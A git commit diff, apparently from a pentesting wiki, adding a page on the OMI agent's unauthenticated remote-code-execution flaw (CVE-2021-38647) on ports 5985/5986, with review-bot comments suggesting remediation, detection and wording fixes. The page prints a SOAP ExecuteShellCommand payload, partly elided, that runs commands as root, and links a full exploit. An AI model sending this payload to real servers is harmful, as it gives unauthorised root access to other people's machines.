GitBook: [#2980] No subject

This commit is contained in:
CPol 2022-02-02 14:36:35 +00:00 committed by gitbook-bot
parent f9971ff6b2
commit d162391473
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
2 changed files with 46 additions and 0 deletions

@ -339,6 +339,7 @@
* [5800,5801,5900,5901 - Pentesting VNC](pentesting/pentesting-vnc.md)
* [5984,6984 - Pentesting CouchDB](pentesting/5984-pentesting-couchdb.md)
* [5985,5986 - Pentesting WinRM](pentesting/5985-5986-pentesting-winrm.md)
* [5985,5986 - Pentesting OMI](pentesting/5985-5986-pentesting-omi.md)
* [6000 - Pentesting X11](pentesting/6000-pentesting-x11.md)
* [6379 - Pentesting Redis](pentesting/6379-pentesting-redis.md)
* [8009 - Pentesting Apache JServ Protocol (AJP)](pentesting/8009-pentesting-apache-jserv-protocol-ajp.md)
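Review bot: the new SUMMARY entry uses the same port pair as the WinRM entry directly above it (5985,5986), so a reader who lands on the WinRM page from the port number will not learn that OMI is the other common service on those ports; consider a one-line cross-reference between pentesting/5985-5986-pentesting-winrm.md and the new pentesting/5985-5986-pentesting-omi.md (not part of this diff).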

@ -0,0 +1,45 @@
# 5985,5986 - Pentesting OMI
## Basic Information
OMI is an [open-source](https://github.com/microsoft/omi) remote configuration management tool developed by Microsoft. OMI agents are commonly found installed on Azure Linux servers when the following services are in use:
* Azure Automation
* Azure Automatic Update
* Azure Operations Management Suite
* Azure Log Analytics
* Azure Configuration Management
* Azure Diagnostics
When these services are configured, the omiengine process will listen on all interfaces and being running as the root user.
![](https://strapi.horizon3ai.com/uploads/Screen\_Shot\_2021\_09\_16\_at\_5\_49\_01\_AM\_2c63a02c76.png)
**Default port:** 5985(http), 5986(https)
##  [CVE-2021-38647](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647)
As of September 16, newly created Linux servers in Azure are still packaged with a vulnerable version of the OMI agent. After deploying a Linux server and enabling one the services listed above, the server will be in a vulnerable state.
The OMI server receives configuration management messages via the /wsman endpoint. Typically, an Authentication header is passed along with the message and the OMI server will ensure the client is authorized communicate. In this case the vulnerability is that when there is no Authentication header the server incorrectly accepts the message and executes the instruction under the root user.
By posting an “ExecuteShellCommand” SOAP payload to the server with no Authentication header specified, it will execute the command as root.
```xml
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>
```
Find full exploit in [https://github.com/horizon3ai/CVE-2021-38647](https://github.com/horizon3ai/CVE-2021-38647)
## References
* [https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/](https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/)
* [https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/](https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/)
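Review bot: the new page says how the authentication bypass works but never says how to fix or detect it: add a short remediation line after the CVE section (update OMI to the patched version named in the linked MSRC advisory, and do not expose 5985/5986 to untrusted networks, given the page's own statement that omiengine listens on all interfaces as root) and note that unauthenticated POSTs to /wsman are the obvious thing to alert on. Wording fixes in the same hunk: "being running as the root user" should be "running as the root user", "authorized communicate" should be "authorized to communicate", "enabling one the services" should be "enabling one of the services", "As of September 16" needs a year (the screenshot URL suggests 2021), and the "##  [CVE-2021-38647]" heading has a double space.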